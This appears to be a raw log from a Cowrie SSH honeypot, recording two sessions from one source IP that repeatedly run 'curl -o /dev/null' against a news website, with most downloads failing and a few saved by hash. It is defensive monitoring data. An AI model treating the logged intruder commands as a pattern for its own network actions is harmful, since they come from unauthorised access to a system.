{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:31.356652Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:31.359625Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:31.384102Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:31.385471Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:31.400155Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:31.401467Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:31.406410Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:31.408112Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:31.421074Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:31.422286Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:31.442767Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:31.444191Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:31.448177Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:31.449401Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:31.462456Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:31.463783Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:31.483594Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:31.485132Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:31.524221Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:31.526796Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:31.533873Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:31.535060Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:31.539447Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:31.540503Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:31.560265Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:31.575964Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:31.576949Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:31.579020Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:31.580282Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:31.613667Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:31.614772Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:31.617872Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:31.619037Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:31.652406Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:31.653715Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:31.654579Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:31.655822Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:31.656430Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:31.673266Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:31.690423Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:31.691539Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:31.693226Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:31.694119Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:31.704460Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:31.743042Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:31.748677Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:31.749753Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:31.753741Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:31.754582Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:31.868098Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:31.869475Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:31.871323Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:31.872491Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:31.875759Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:31.876816Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:31.912009Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:31.913304Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:31.921639Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:31.922840Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:31.928462Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:31.929492Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:31.950120Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:31.961613Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:31.962752Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:31:31.966003Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:31.967543Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:31.970323Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:31.971246Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:31.975195Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:31.991597Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:32.000007Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:32.000875Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:31:32.003077Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:32.008247Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:32.009247Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:32.013423Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:32.037957Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:32.039215Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:32.047671Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:32.048697Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:32.074681Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:32.086483Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:32.087613Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:32.096288Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:32.111773Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:32.112834Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:32.138116Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:32.143502Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:32.144611Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:32.154761Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:32.179834Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:32.181484Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:32.218157Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:32.251067Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:32.252354Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:32.261329Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:32.293031Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:32.294462Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:32.306775Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:32.308181Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:32.331892Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:32.332817Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:32.349441Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:32.350607Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:32.369712Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:32.370846Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:32.410735Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:32.411815Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:32.427784Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:32.428783Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:32.440329Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:32.442314Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:32.452101Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:32.453023Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:32.463557Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:32.464804Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:32.484988Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:32.496003Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:32.497148Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:32.506145Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:32.507547Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:32.524745Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:32.527019Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
